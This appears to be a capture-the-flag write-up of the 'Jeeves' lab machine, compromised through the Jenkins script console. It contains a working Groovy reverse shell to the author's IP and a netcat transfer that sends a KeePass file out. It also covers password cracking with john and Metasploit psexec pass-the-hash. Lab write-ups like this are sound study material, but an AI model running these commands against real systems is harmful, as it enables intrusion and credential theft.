Interface found via Dirbuster
http://10.10.10.63:50000/askjeeves/
Initial Shell
manage jenkins > script console
String host="10.10.15.126";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
nc -lnvp 8044
Windows Enum
Tried following command after reading about a .kdbx file on forum:
dir c:*.kdbx /s /b - https://www.lifewire.com/dir-command-4050018
Result was - c:\Users\kohsuke\Documents\CEH.kdbx
.kdbx is keepass file extension
ftp'd technique to get nc.exe over to windows box into following directory:
C:\Users\kohsuke\Documents
Transferred .kdbx file over using following commands:
on Kali : nc -lnvp 4567 > CEH.kdbx
on Win : nc 10.10.15.126 4567 < CEH.kdbx
Converting the file
/usr/sbin/keepass2john CEH.kdbx > jeeves.hash remove CEH from start of new jeeves.hash - I used nano.
Cracking can be done either with hashcat or john - used john as
hashcat not work on this kali
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt jeeves.hash password comes back as: moonshine1
Also
These were all distractions to make you look elsewhere.
Examined following files:
C:\Users\Administrator.jenkins\users\admin>type config.xml
Noted password hash:
#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO
C:\Users\Administrator.jenkins\secrets>more initialAdminPassword
more initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491
C:\Users\Administrator.jenkins\secrets>more master.key
more master.key
40e19a08d55698273e82182aae560bb78f5c99205e1b603de13e4729dfeed0bfaa9ed79557107ca7294a8a18a9bd81d60ee5610943e488bf2150dc1b06935b8f2a4f5b9370e0cb1d28249758e2b96cf2b658f2c5290fc6a202d9a04621c79eb0d09faf3246e50998a0aaea42b76eb96186f4842e0f9c07bbbd77152afc59de16
keepass
Downloaded keepass software and installed on
windows, opened CEH.kdbx file - used moonshine1
Under ? I find the following: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Used metasploit - (exploit/windows/smb/psexec)
smbuser: administrator
smbpass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Finding Root
C:\Users\Administrator\Desktop>more hm.txt
more hm.txt
The flag is elsewhere. Look deeper.
used the following command to look deeper for hidden files: dir /r
found hm.txt:root.txt - more info at:
https://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartment/
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac*
Flags - last 5 digits obfuscated
user.txt
e3232272596fb47950d59c4cf1e
root.txt
afbc5bd4b615a60648cec41c6ac
Useful links
https://www.rubydevices.com.au/blog/how-to-hack-keepass
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
https://www.lifewire.com/dir-command-4050018
http://www.harmj0y.net/blog/redteaming/a-case-study-in-attacking-keepass/
